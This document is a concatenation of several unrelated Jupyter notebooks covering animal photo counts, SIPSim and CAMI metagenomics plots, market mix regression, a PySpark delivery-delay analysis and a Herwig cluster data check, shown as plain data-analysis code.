rec_list = np.zeros((5, 400))
for t in range(5):
rec = np.load('./learning-process/pi-it-' + str(i) + '-' + str(t+1) + '.npy')
rec_list[t] = rec[:400, 0]
l[inx], = plt.plot(np.mean(rec_list, axis=0), label='the ' + str(i) + 'th iteration')
rec_max = np.max(rec_list, axis=0)
rec_min = np.min(rec_list, axis=0)
plt.fill_between(np.arange(400), rec_max, rec_min, color='grey', alpha='0.3')
plt.legend(handles=[l[0], l[1], l[2]])
|
record/.ipynb_checkpoints/visualization-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + active=""
# Script for counting the number of times an animal was photographed
# Author: <NAME>
# Date: May 25 2016
# -
import GetPropertiesAPI as GP
from collections import Counter
import pandas as pd
import importlib
importlib.reload(GP)
import statistics as s
import operator
from collections import defaultdict
import csv
import matplotlib.pyplot as plt
# +
aid_list = []
gidAidDict = {}
for gid in range(1,9407):
aid = GP.getAnnotID(gid)
aid_list.append(aid)
gidAidDict[gid] = aid
aid_list = list(filter(lambda x: x != None,aid_list))
# -
aids = []
for aid_l in aid_list:
for aid in aid_l:
aids.append(aid)
aidContribTupList = []
for aid in aids:
contrib = GP.getImageFeature(aid,'image_contributor_tag')
aidContribTupList.append((aid,contrib[0]))
# +
aidNidMap = {}
aidNamesMap = {}
aidNidTupList = [] # modified
for aid in aids:
nid = GP.getImageFeature(aid,'nids')
aidNidMap[aid] = nid
aidNidTupList.append((aid,nid[0]))
# -
nids = []
for aid in aidNidMap.keys():
nids.append(aidNidMap[aid][0])
nids = list(filter(lambda x : x > 0,nids))
counter_nid= Counter(nids)
gidAidDict
aidGidTupList = [] # key : aid and value : gid # modified
for gid in gidAidDict.keys():
if gidAidDict[gid] != None:
for aid in gidAidDict[gid]:
aidGidTupList.append((aid,gid))
aidGidDf = pd.DataFrame(aidGidTupList,columns = ['AID','GID'])
aidNidDf = pd.DataFrame(aidNidTupList,columns = ['AID','NID'])
aidContribDf = pd.DataFrame(aidContribTupList,columns = ['AID','CONTRIBUTOR'])
aidNidDf = aidNidDf[(aidNidDf['NID']>0)]
aidGidNidDf = pd.merge(aidGidDf,aidNidDf,left_on = 'AID',right_on = 'AID')
aidGidNidContribDf = pd.merge(aidGidNidDf,aidContribDf,left_on = 'AID',right_on = 'AID')
aidGidNidContribDf.to_csv('results.csv',index=False)
# +
with open('results.csv') as f: # read from csv file into a key : GID and value : CONTRIBUTOR
reader = csv.DictReader(f)
gidContribMap = { line['GID']: line['CONTRIBUTOR'] for line in reader }
len(gidContribMap)
# +
ContribTotal = {} # dict with key : CONTRIBUTOR and value: Total photos taken
for gid,contrib in gidContribMap.items():
ContribTotal[contrib] = ContribTotal.get(contrib,0) + 1
print(s.mean(ContribTotal.values()))
print(s.stdev(ContribTotal.values()))
# -
with open('results.csv') as f2: # read from csv file into a Dict with key : AID and value : GID, NID, CONTRIBUTOR
reader2 = csv.DictReader(f2)
aidToGidNidContribMap = { line['AID']: [line['GID'], line['NID'], line['CONTRIBUTOR']] for line in reader2 }
NidContribTotal = {} # dict with key : NID, CONTRIBUTOR and value: Total photos taken
for aid,(gid,nid,contrib) in aidToGidNidContribMap.items():
NidContribTotal[nid,contrib] = NidContribTotal.get((nid,contrib),0) + 1
csv_out = csv.writer(open('nidtoContributor.csv', 'w')) # rename file, results of Nid to Contributor to Total
csv_out.writerow(['NID', 'CONTRIBUTOR', 'TOTAL'])
for (Nid, Contrib), value in NidContribTotal.items():
csv_out.writerow([Nid, Contrib, value])
# +
#from collections import defaultdict
averageCountofPictures = defaultdict(list) # dict where key : NID and values: list of pictures taken per photographer
for (nid, contrib), total in NidContribTotal.items():
averageCountofPictures[nid].append(total)
#averageCountofPictures
# +
countUniquePhotoPerPic = {} # dict where key : NID and values : # of CONTRIBUTERS
for (nid, contrib), total in NidContribTotal.items():
countUniquePhotoPerPic[nid] = countUniquePhotoPerPic.get((nid),0) + 1
#countUniquePhotoPerPic['741']
# -
# +
#JUST LOOK FROM HERE
# -
# Arguments : Required Feature
# Accepted Features: species_texts, age_months_est, exemplar_flags, sex_texts, yaw_texts, quality_texts,image_contributor_tag
# Returns : Returns Dictionary of total feature
def getContributorFeature(feature):
#SHOULD WE HAVE THIS????
with open('results.csv') as f: # read from csv file into a Dict with key : AID and value : GID, NID, CONTRIBUTOR
reader = csv.DictReader(f)
aidToGidNidContribMap = { line['AID']: [line['GID'], line['NID'], line['CONTRIBUTOR']] for line in reader }
contribToFeatureMap = defaultdict(list) # dict where key : contributor and values : List of feature
for aid,(gid,nid,contrib) in aidToGidNidContribMap.items():
contribToFeatureMap[contrib].append(GP.getImageFeature(aid, feature)[0])
contribAnimFeatCount = {} # dict where key : contributor and values : total of specific feature
for key in contribToSexMap.keys():
contribAnimFeatCount[key]=dict(Counter(contribToFeatureMap[key]))
return contribAnimFeatCount
# +
#m={}
#x={}
#m=getContributorFeature("species_texts")
#x=getContributorFeature("sex_texts")
#print(m)
# +
#FOR ALL MALES, FEMALES, UNKNOWN INTO CSV FILE
malesTotal={}
femaleTotal={}
unknownTotal={}
for contrib, feature in x.items(): #change x
malesTotal[contrib]=feature.get('Male', 0)
femaleTotal[contrib]=feature.get('Female', 0)
unknownTotal[contrib]=feature.get('UNKNOWN SEX', 0)
maleTotal=(sum(malesTotal.values()))
femaleTotal=(sum(femaleTotal.values()))
unknownTotal=(sum(unknownTotal.values()))
csv_out = csv.writer(open('contribSexTotal.csv', 'w')) # rename file, results of Nid to Contributor to Total
csv_out.writerow(['FEATURE', 'MALE', 'FEMALE', 'UNKWOWN SEX'])
csv_out.writerow(['sex_texts', malesTotal, femaleTotal, unknownTotal ])
# -
# Arguments : ContributorToFeatureDict , Required Specific Feature
# Accepted Specific Features: sex_texts = "Male", "Female", "UNKNOWN SEX", etc.
# Returns :
def getContributorSpecificFeature(contribAnimFeatCount, specificfeat):
contribSpecFeatureMap={}
for contrib, feature in contribAnimFeatCount.items():
contribSpecFeatureMap[contrib]=feature.get(specificfeat , 0)
csv_out = csv.writer(open('contrib'+ specificfeat +'Map.csv', 'w')) #used for plotting later
csv_out.writerow(['CONTRIBUTOR', specificfeat])
for contrib, specfeature in contribSpecFeatureMap.items():
csv_out.writerow([contrib, specfeature])
# +
#getContributorSpecificFeature(contribAnimSexCount, "UNKNOWN SEX")
getContributorSpecificFeature(contribAnimSexCount, 'Female')
# -
# Arguments : csv_file , Required Specific Feature
# Accepted Specific Features: sex_texts = "Male", "Female", "UNKNOWN SEX", etc.
# Returns : NONE
def creategraph(csv_file, specific_feature):
data = pd.read_csv(csv_file, sep=',',header=0, index_col =0) #csv_file
data.plot(kind='bar')
plt.ylabel('Number of ' + specific_feature + ' taken')
plt.xlabel('Contributor')
plt.title('Contributor to'+ specific_feature + 'Totals')
plt.show()
#creategraph('contribMaleMap.csv', "Male")
creategraph('contribFemaleMap.csv', 'Female')
|
Notebooks_DEPRECATED/IndividualAnimalPhotoCount.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R [conda env:SIPSim_py3]
# language: R
# name: conda-env-SIPSim_py3-r
# ---
# # Goal
#
# * re-plotting SIPSim validation plot (example of OTU distribution in control vs labeled-treatment gradient)
# # Setting variables
#workDir = '/home/nick/notebook/SIPSim/dev/bac_genome1147/validation/'
#genomeDir = '/var/seq_data/ncbi_db/genome/Jan2016/bac_complete_spec-rep1_rn/'
#R_dir = '/home/nick/notebook/SIPSim/lib/R/'
#figureDir = '/home/nick/notebook/SIPSim/figures/bac_genome_n1147/'
workDir = '/ebio/abt3_projects/methanogen_host_evo/SIPSim_pt2/data/bac_genome1147/validation/'
# # Init
library(ggplot2)
library(dplyr)
library(tidyr)
library(gridExtra)
# BD for G+C of 0 or 100
BD.GCp0 = 0 * 0.098 + 1.66
BD.GCp50 = 0.5 * 0.098 + 1.66
BD.GCp100 = 1 * 0.098 + 1.66
# cutoff to call real incoporator
BD_shift.cut = 0.001
# # Plotting abundance distributions (paper figure)
# ## Loading OTU abundances
# +
# loading file
F = file.path(workDir, 'OTU_n2_abs1e9.txt')
df.abs = read.delim(F, sep='\t')
F = file.path(workDir, 'OTU_n2_abs1e9_PCR_subNorm.txt')
df.sub = read.delim(F, sep='\t')
lib.reval = c('1' = 'control',
'2' = 'treatment')
df.abs = mutate(df.abs, library = plyr::revalue(as.character(library), lib.reval))
df.sub = mutate(df.sub, library = plyr::revalue(as.character(library), lib.reval))
# -
# ## Loading incorp identity
#
# * Which taxa are actually incorporators
# +
F = file.path(workDir, 'ampFrags_BD-shift.txt')
df.shift = read.delim(F, sep='\t') %>%
filter(library == 2) %>%
mutate(true_incorp = median >= BD_shift.cut)
# status
df.shift$median %>% table %>% print
df.shift$true_incorp %>% table %>% print
df.shift %>% dim %>% print
df.shift %>% head(n=3)
# -
# ## Formatting
# +
# absolute abundances
df.abs %>% dim %>% print
df.abs = df.abs %>%
left_join(df.shift %>% dplyr::select(taxon, true_incorp),
c('taxon')) %>%
mutate(true_incorp = ifelse(is.na(true_incorp), FALSE, true_incorp),
alpha = ifelse(true_incorp==TRUE, 0.5, 0.15))
df.abs %>% dim %>% print
# subsampled abundances
df.sub %>% dim %>% print
df.sub = df.sub %>%
left_join(df.shift %>% dplyr::select(taxon, true_incorp),
c('taxon')) %>%
mutate(true_incorp = ifelse(is.na(true_incorp), FALSE, true_incorp),
alpha = ifelse(true_incorp==TRUE, 0.5, 0.15))
df.sub %>% dim %>% print
# status
df.abs %>% head(n=3) %>% print
df.sub %>% head(n=3) %>% print
# +
# creating relative abundancs for df.sub
df.sub.rel = df.sub %>%
group_by(library, fraction) %>%
mutate(total_count = sum(count)) %>%
ungroup() %>%
mutate(count = count / total_count) %>%
dplyr::select(-total_count)
df.sub.rel %>% head(n=3)
# -
# ## Plotting
x.lab = expression(paste('Buoyant density (g ml' ^ '-1', ')'))
# +
# plotting absolute abundances
p = ggplot(df.abs, aes(BD_mid, count, fill=taxon)) +
geom_vline(xintercept=c(BD.GCp50), linetype='dashed', alpha=0.5) +
scale_x_continuous(expand=c(0,0)) +
labs(x='Buoyant density') +
facet_grid(library ~ .) +
theme_bw() +
theme(
axis.title.y = element_text(vjust=1),
axis.title.x = element_blank(),
legend.position = 'none',
plot.margin=unit(c(1,1,0.1,1), "cm")
)
p1 = p +
geom_area(alpha=0.2, stat='identity', position='dodge') +
geom_area(data = df.abs %>% filter(true_incorp == TRUE),
alpha=0.5, stat='identity', position='dodge') +
labs(y='Pre-sequencing\nsimulation\n(absolute abundance)')
options(repr.plot.width=7, repr.plot.height=3.5)
plot(p1)
# +
# plotting absolute abundances of subsampled taxa
p = ggplot(df.sub, aes(BD_mid, count, fill=taxon)) +
geom_vline(xintercept=c(BD.GCp50), linetype='dashed', alpha=0.5) +
scale_x_continuous(expand=c(0,0)) +
labs(x=x.lab) +
facet_grid(library ~ .) +
theme_bw() +
theme(
legend.position = 'none'
)
p2 = p +
geom_area(alpha=0.2, stat='identity', position='dodge') +
geom_area(data = df.sub %>% filter(true_incorp == TRUE),
alpha=0.5, stat='identity', position='dodge') +
labs(y='Post-sequencing\nsimulation\n(absolute abundance)') +
theme(
axis.title.y = element_text(vjust=1),
axis.title.x = element_blank(),
plot.margin=unit(c(0.1,1,0.1,1), "cm")
)
options(repr.plot.width=7, repr.plot.height=3.5)
plot(p2)
# +
# plotting relative abundances of subsampled taxa
p3 = p +
geom_area(alpha=0.5, stat='identity', position='fill') +
geom_area(aes(alpha=alpha), stat='identity', position='fill') +
#geom_line(aes(alpha=true_incorp), color='black', size=0.2, position='fill') +
geom_vline(xintercept=c(BD.GCp50), linetype='dashed', alpha=0.5) +
labs(y='Post-sequencing\nsimulation\n(relative abundance)') +
theme(
axis.title.y = element_text(vjust=1),
plot.margin=unit(c(0.1,1,1,1.35), "cm")
)
options(repr.plot.width=7, repr.plot.height=3.5)
plot(p3)
# +
# combining plots
p.comb = cowplot::ggdraw() +
geom_rect(aes(xmin=0, ymin=0, xmax=1, ymax=1), fill='white') +
cowplot::draw_plot(p1, 0.0, 0.69, 0.99, 0.31) +
cowplot::draw_plot(p2, 0.01, 0.38, 0.98, 0.31) +
cowplot::draw_plot(p3, 0.0, 0.0, 0.99, 0.38)
options(repr.plot.width=7, repr.plot.height=7)
plot(p.comb)
# -
# ### Saving figures
F = file.path(workDir, 'abundDist_example.pdf')
ggsave(F, p.comb, width=9, height=9)
cat('File written:', F, '\n')
F = file.path(workDir, 'abundDist_example.tiff')
ggsave(F, p.comb, width=9, height=9, dpi=300)
cat('File written:', F, '\n')
F = file.path(workDir, 'abundDist_example.png')
ggsave(F, p.comb, width=9, height=9, dpi=250)
cat('File written:', F, '\n')
|
ipynb/bac_genome/n1147_pt2/validation_plot.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Import Libraries
# + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5"
import numpy as np # linear algebra
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from ipykernel import kernelapp as app
from scipy import stats
import matplotlib.pyplot as plt
from statsmodels.tools.eval_measures import rmse
import os
print(os.listdir("../11). Market Mix Modeling using Python"))
# Any results you write to the current directory are saved as output.
# -
# ## Data Pre-Processing
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"
#Read Advertising Data dummy dataset
raw_df = pd.read_csv("../11). Market Mix Modeling using Python/Advertising.csv")
raw_df.head()
# + _uuid="9d9ec0d2d9f80e26f04fc71fccc92fd2b48db3c3"
#remove extra 'Unnamed' column
df = df.loc[:, ~df.columns.str.contains('^Unnamed')]
df.head()
# -
df.columns
# + _uuid="e3dfc54a64dd97d93b24ba320c3f716cd4945d0a"
#Data Description
df_clean.describe()
# + [markdown] _uuid="ba5bcf6bfdb494aa3c53e725eba848762649b797"
# ## Exploratory Data Analysis (EDA)
# + _uuid="9d3d09883d9de8a680b483ed07cbfaa7e9b7cc3d"
corr = df.corr()
sns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, annot=True, cmap=sns.diverging_palette(220, 20, as_cmap=True))
# + _uuid="56dd3957ba66b4cab2ceb93de2395e5faf5a48c3"
sns.pairplot(df)
# + _uuid="1ff44e086aaceb70f04a23a63cd081b3fd16a2ef"
# Setting X and y variables
X = df.loc[:, df.columns != 'sales']
y = df['sales']
# Building Random Forest model
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_absolute_error as mae
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.25, random_state=0)
model = RandomForestRegressor(random_state=1)
model.fit(X_train, y_train)
pred = model.predict(X_test)
# Visualizing Feature Importance
feat_importances = pd.Series(model.feature_importances_, index=X.columns)
feat_importances.nlargest(25).plot(kind='barh',figsize=(10,10))
# -
# ## OLS Model
# +
# OLS, short for Ordinary Least Squares, is a method used to estimate the parameters in a linear regression model.
# + _uuid="dfcc09c071d33a4322d4983544e7a83effaef6a2"
import statsmodels.formula.api as sm
model = sm.ols(formula="sales~TV+radio+newspaper", data=df).fit()
print(model.summary())
# -
# 1. The Adj. R-squared is 0.896, which means that almost 90 of all variations in our data can be explained by our model,
# which is pretty good!
#
# 2. The p-values for TV and radio are less than 0.000, but the p-value for newspaper is 0.86,
# which indicates that newspaper spend has no significant impact on sales.
# Defining Actual and Predicted values
y_pred = model.predict()
labels = df['sales']
df_temp = pd.DataFrame({'Actual': labels, 'Predicted':y_pred})
df_temp.head()
# Creating Line Graph
from matplotlib.pyplot import figure
figure(num=None, figsize=(15, 6), dpi=80, facecolor='w', edgecolor='k')
y1 = df_temp['Actual']
y2 = df_temp['Predicted']
plt.plot(y1, label = 'Actual')
plt.plot(y2, label = 'Predicted')
plt.legend()
plt.show()
# + _uuid="ab1a0a9ac9e097cec028374e65421b1ebccc18fe"
#Model 2 Parameters, error, and r square
print('Parameters: ', model.params)
print("************************")
print('R2: ', model.rsquared)
print("************************")
print('Standard errors: ', model.bse)
print("************************")
print('Root Mean Square Error: ',rmse(labels,y_pred))
# + _uuid="61f00f1d159abd0a15a5a76d2e6fc4e7a3717c16"
#Actual and predicted values
y_pred = model.predict()
df1 = pd.DataFrame({'Actual': labels, 'Predicted': y_pred})
df1.head(10)
|
11). Market Mix Modeling using Python/market-mix-modeling-using-python.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Hyotesis 11 and 12
#
# ### H11: The delay time changes according to the state of delivery
# ### H12: The delay time is related to the product category
from pyspark.sql import SparkSession, functions as F
spark = SparkSession.builder.getOrCreate()
# +
orders_df = spark.read \
.option('quote', '\"') \
.option('escape', '\"') \
.csv('./dataset/olist_orders_dataset.csv', header=True, multiLine=True)
customer_df = spark.read \
.option('quote', '\"') \
.option('escape', '\"') \
.csv('./dataset/olist_customers_dataset.csv', header=True, multiLine=True)
orders_df.printSchema()
customer_df.printSchema()
df = orders_df.join(customer_df, orders_df.customer_id == customer_df.customer_id)
# -
df.limit(5).toPandas()
late_df = df.filter(F.col('order_delivered_customer_date') > F.col('order_estimated_delivery_date'))
late_df.toPandas()
# +
aux_df = late_df.select(F.col('order_estimated_delivery_date').alias('estimated_date'),
F.col('order_delivered_customer_date').alias('deliver_date'),
F.col('customer_state').alias('state'))
aux_df = aux_df.withColumn('delay_in_days', F.datediff(F.col('deliver_date'), F.col('estimated_date')))
aux_df.show()
# -
aux_df = aux_df.groupBy('state').avg().orderBy('avg(delay_in_days)', ascending=False)
aux_df = aux_df.withColumn('avg(delay_in_days)', F.round(aux_df['avg(delay_in_days)'], 2))
aux_df.show(27)
aux_df.toPandas().plot(kind='bar', x='state', figsize=(16, 6))
# # Conclusion
#
# ## H11
# ### The hypotesis 11 is valid, as all states have different average delays
#
# ## H12
# ### The hypotesis 12 was discarded due to data inconsistency
|
hypothesis_11_12.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R [conda env:UpSetR]
# language: R
# name: conda-env-UpSetR-r
# ---
# # Goal
#
# The aim of this notebook is to compare the mappability of profiles obtained with the different databases on CAMI challenge data
# # Init
library(tidyverse)
library(stringr)
library(forcats)
library(cowplot)
library(data.table)
library(glue)
# # Var
work_dir = "/ebio/abt3_projects/Struo/struo_benchmark/data/profiles_cami"
# ## Dataframe with Kraken classification reads
# Kraken proportion of reads mapped
database = c("GTDB", "progenomes", "defaults")
kraken_logs = map(database,
function(x) file.path(work_dir, x, "logs/kraken") %>%
list.files(., full.names = T)) %>% unlist
# +
read_klog = function(path){
# Sample community name
community_name = path %>%
basename %>%
str_replace(., ".log", "")
# Database
db = path %>%
str_split("/", simplify = T) %>%
nth(8)
# Read file line by line
# Keep lines with classified and unclassified reads
# create table with data for each sample
readLines(path) %>%
data.frame(txt = .) %>%
tail(., n=2) %>%
separate(txt, into = c("seqs", "category"), sep = "sequences") %>%
mutate(seqs = as.numeric(seqs),
category = c("classified", "unclassified"),
community = rep(community_name, 2),
database = rep(db, 2))
}
# +
kraken_classified_complete = map_df(kraken_logs, function(x) read_klog(x)) %>%
arrange(community)
kraken_classified_complete %>% head
# -
kraken_classified = kraken_classified_complete %>%
group_by(database, community) %>%
mutate(sum = sum(seqs)) %>%
ungroup %>%
mutate(proportion = round((seqs/sum)* 100, 2)) %>%
select(-sum) %>%
filter(category == "classified") %>%
arrange(community, -proportion) %>%
mutate(database = fct_recode(database, RefSeq = "defaults", proGenomes = "progenomes")) %>%
mutate(database = fct_relevel(database, c("RefSeq", "proGenomes", "GTDB")))
kraken_classified %>% head
# ## Read Bracken logs
# Kraken proportion of reads mapped
database = c("GTDB", "progenomes", "defaults")
bracken_logs = map(database,
function(x) file.path(work_dir, x, "logs/bracken") %>%
list.files(., full.names = T)) %>% unlist
read_blog = function(path){
# Synth community name
community_name = path %>%
basename %>%
str_replace(., ".log", "")
# Database
db = path %>%
str_split("/", simplify = T) %>%
nth(8)
# Read file line by line
# Keep lines with total and used reads at the species level
# create table with data for each sample
readLines(path) %>%
data.frame(txt = .) %>%
filter(str_detect(txt," Total reads in sample") | str_detect(txt,"Total reads kept")) %>%
separate(txt, into = c("txt", "seqs"), sep = ":") %>%
select("seqs") %>%
mutate(seqs = as.numeric(seqs),
category = c("Total", "Used"),
community = rep(community_name, 2),
database = rep(db, 2))
}
# +
bracken_used_complete = map_df(bracken_logs, function(x) read_blog(x)) %>%
arrange(community) %>%
mutate(database = fct_recode(database, RefSeq = "defaults", proGenomes = "progenomes")) %>%
mutate(database = fct_relevel(database, c("RefSeq", "proGenomes", "GTDB")))
bracken_used_complete %>% head
# -
# ## Bracken species table
bracken_tables = function(file_path){
tax_levels = c("Domain", "Phylum", "Class",
"Orden", "Family", "Genus", "Species")
id_ranks = c("id_cellular", "id_Domain", "id_Phylum", "id_Class",
"id_Order", "id_Family", "id_Genus",
"id_Species")
# Read table, select columns and separate taxonomy
tbl_raw = read_delim(file_path, delim = "\t") %>%
select(-c(name, taxonomy_lvl)) %>%
separate(taxonomy, into = tax_levels, sep = ";") %>%
separate(taxIDs, into = id_ranks, sep = ";") %>%
select(-id_cellular)
# Create fractiion and count tables
# Raw counts
tbl_count = tbl_raw %>%
select(-ends_with("_frac"))
# Relative abudnances
tbl_fraction = tbl_raw %>%
select(-ends_with("_num"))
percentages = tbl_fraction %>%
select(ends_with("_frac")) %>%
(function(x) (x * 100))
tbl_fraction = tbl_fraction %>%
select(-ends_with("_frac")) %>%
bind_cols(percentages)
list(relabund = tbl_fraction, count = tbl_count)
}
# Paths
defaults_bracken_path = file.path(work_dir, "defaults/kraken/all-combined-bracken.tsv")
progenomes_bracken_path = file.path(work_dir, "progenomes/kraken/all-combined-bracken.tsv")
gtdb_bracken_path = file.path(work_dir, "GTDB/kraken/all-combined-bracken.tsv")
# +
# Defaults
bracken_cami_defaults = bracken_tables(defaults_bracken_path)
defaults_relabund = bracken_cami_defaults$relabund
# progenomes
bracken_cami_progenomes = bracken_tables(progenomes_bracken_path)
progenomes_relabund = bracken_cami_progenomes$relabund
# GTDB
bracken_cami_gtdb = bracken_tables(gtdb_bracken_path)
gtdb_relabund = bracken_cami_gtdb$relabund
# -
# ## Read HUMANn2 Files
hmn_names = c('Gene_Family',
'H_S001',
'H_S002',
'H_S003',
'H_S004',
'H_S005')
# ### Read HUMANn2 Logs
read_hlog = function(path){
# Synth community name
community_name = path %>%
basename %>%
str_replace(., ".log", "")
# Database
db = path %>%
str_split("/", simplify = T) %>%
nth(8)
# Read file line by line
# Keep lines with total and used reads at the species level
# create table with data for each sample
grep_cmd = glue('grep "Unaligned reads after" {path}', path = path)
system(grep_cmd, intern = T) %>%
data.frame(txt = .) %>%
separate(txt, into = c("Stamp", "txt", "unmapped"), sep = ": ") %>%
select("unmapped") %>%
mutate(unmapped = str_replace(unmapped, " %", "")) %>%
mutate(unmapped = as.numeric(unmapped),
category = c("Nucleotide", "Translated"),
community = rep(community_name, 2),
database = rep(db, 2))
}
# Humann2 proportion of reads unmapped
database = c("GTDB", "progenomes", "defaults")
humann_logs = map(database,
function(x) file.path(work_dir, x, "logs/humann2") %>%
list.files(., full.names = T)) %>% unlist
# +
human_unmapped = map_df(humann_logs, function(x) read_hlog(x)) %>%
arrange(community) %>%
mutate(database = fct_recode(database, ChocoPhlAn = "defaults", proGenomes = "progenomes")) %>%
mutate(database = fct_relevel(database, c("ChocoPhlAn", "proGenomes", "GTDB")))
human_mapped = human_unmapped %>%
mutate(proportion = 100 - unmapped) %>%
select(-unmapped)
human_mapped %>% head
# -
# # Assessment of results
# Colors
dbs_pallete = c("#969696", "#1879bf", "#1db628")
# ## Tax Profile
# ### Kraken - proportion of mapped reads
# Summary of mapped reads per database
kraken_classified %>%
group_by(database) %>%
summarise(mean = mean(proportion), sd = sd(proportion))
kraken_classified %>% head
# +
options(repr.plot.width = 4, repr.plot.height = 5)
k_plt = kraken_classified %>%
ggplot(aes(x = database, y = (proportion))) +
geom_jitter(position=position_jitter(0.1), aes(alpha = 0.01), color = "#A9A9A9") +
stat_summary(fun.data=mean_sdl, geom="pointrange", color="black") +
theme_light() +
theme(axis.text.x = element_text(angle = 45, hjust = 1, size = 15),
axis.text.y = element_text(size = 12),
axis.title.y = element_text(size = 15),
legend.position = "none") +
labs(x = "Database", y = "Mapped reads (%)", title = "Kraken") +
lims(y = c(0,100))
plot(k_plt)
# -
# ### Bracken - proportion of used read at species level
# +
# Determine the number of reads actually used by Bracken
br_total = bracken_used_complete %>%
filter(category == "Total") %>%
pull(seqs)
br_used = bracken_used_complete %>%
filter(category == "Used") %>%
pull(seqs)
br_proportion = bracken_used_complete %>%
filter(category == "Used") %>%
select(community, database) %>%
mutate(proportion = (br_used /br_total)*100)
br_proportion %>% head
# -
# Summary of used reads per database
br_proportion %>%
group_by(database) %>%
summarise(mean = mean(proportion), sd = sd(proportion))
# +
options(repr.plot.width = 4, repr.plot.height = 5)
b_plt = br_proportion %>%
ggplot(aes(x = database, y = proportion)) +
geom_jitter(position=position_jitter(0.1), aes(alpha = 0.01), color = "#A9A9A9") +
stat_summary(fun.data=mean_sdl, geom="pointrange", color="black") +
theme_light() +
theme(axis.text.x = element_text(angle = 45, hjust = 1, size = 15),
axis.text.y = element_text(size = 12),
axis.title.y = element_text(size = 15),
legend.position = "none") +
labs(x = "Database", y = "Mapped reads (%)", title = "Bracken") +
lims(y = c(0,100))
plot(b_plt)
# -
# ### Kraken-Bracken Plots
# Kraken and Bracken mapping
options(repr.plot.width = 8, repr.plot.height = 5)
plot_grid(k_plt, b_plt, nrow = 1, labels = "AUTO")
# ## Functional Profile
# ### HUMANn2 proportion of mapped reads after nucleotide search
hmn2_proportion = human_mapped %>%
filter(category == "Nucleotide") %>%
select(-category)
# +
options(repr.plot.width = 4, repr.plot.height = 5)
hmn2_nuc_plt = hmn2_proportion %>%
ggplot(aes(x = database, y = proportion)) +
geom_jitter(position=position_jitter(0.1), aes(alpha = 0.01), color = "#A9A9A9") +
stat_summary(fun.data=mean_sdl, geom="pointrange", color="black") +
theme_light() +
theme(axis.text.x = element_text(angle = 45, hjust = 1, size = 15),
axis.text.y = element_text(size = 12),
axis.title.y = element_text(size = 15),
legend.position = "none") +
labs(x = "Database", y = "Mapped reads (%)", title = "HUMANn2 - Nucleotide") +
lims(y = c(0,100))
plot(hmn2_nuc_plt)
# -
# ### HUMANn2 proportion of mapped reads after translated search
hmn2_proportion = human_mapped %>%
filter(category == "Translated") %>%
select(-category)
# +
options(repr.plot.width = 4, repr.plot.height = 5)
hmn2_trns_plt = hmn2_proportion %>%
ggplot(aes(x = database, y = proportion)) +
geom_jitter(position=position_jitter(0.1), aes(alpha = 0.01), color = "#A9A9A9") +
stat_summary(fun.data=mean_sdl, geom="pointrange", color="black") +
theme_light() +
theme(axis.text.x = element_text(angle = 45, hjust = 1, size = 15),
axis.text.y = element_text(size = 12),
axis.title.y = element_text(size = 15),
legend.position = "none") +
labs(x = "Database", y = "Mapped reads (%)", title = "HUMANn2 - Translated") +
lims(y = c(0,100))
plot(hmn2_trns_plt)
# -
# # All plots combined
# Kraken and Bracken mapping
options(repr.plot.width = 6, repr.plot.height = 9)
final_plot = plot_grid(k_plt, b_plt, hmn2_nuc_plt, hmn2_trns_plt, nrow = 2, labels = "AUTO")
final_plot
# + deletable=false editable=false run_control={"frozen": true}
# # Save plot
# plot_file = "./images/CAMI_plot_combined.png"
# save_plot(filename = plot_file, plot = final_plot,
# base_height = 9, base_width = 6, dpi = 300)
# -
# # Session Info
sessionInfo()
|
benchmark/04_CAMI_stats.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: a-herwig
# language: python
# name: herwig
# ---
# # Introduction
#
# Andrezej generated events with clusters about 1 GeV to "remove" the conditional effects.
# This notebook is to check if the inputs are truely what we wanted.
#
#
# Andrzej investigated this and found the there were photons radiated therefore we observed masses of the clusters smeared around 1 GeV.
#
# Andrzej: Concerning the asymmetric cluster decay I think it is because the clusters can decay to rho + pi or eta+pi. We could filter them out and check.
# +
import os
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import sonnet as snt
from gan4hep.utils_plot import add_mean_std, array2hist, view_particle_4vec
from graph_nets import graphs
from gan4hep import rnn_rnn_gan as toGan
from gan4hep.graph import loop_dataset
from gan4hep.graph import read_dataset
# -
evts_per_record = 1000
batch_size = 1000
test_data_name = '/global/homes/x/xju/work/Herwig/Clusters1GeV/inputs/val/all_*.tfrec'
dataset, n_graphs = read_dataset(test_data_name, evts_per_record)
n_batches = n_graphs//batch_size
print("total {} graphs iterated with batch size of {} and {} batches".format(n_graphs, batch_size, n_batches))
test_data = loop_dataset(dataset, batch_size)
truth_4vec = []
input_4vec = []
for inputs, targets in test_data:
input_4vec.append(inputs.nodes)
truth_4vec.append(tf.reshape(targets.nodes, [batch_size, -1, 4]).numpy())
len(truth_4vec), targets.nodes.shape, inputs.nodes.shape
truth_4vec = np.concatenate(truth_4vec, axis=0)
input_4vec = np.concatenate(input_4vec)
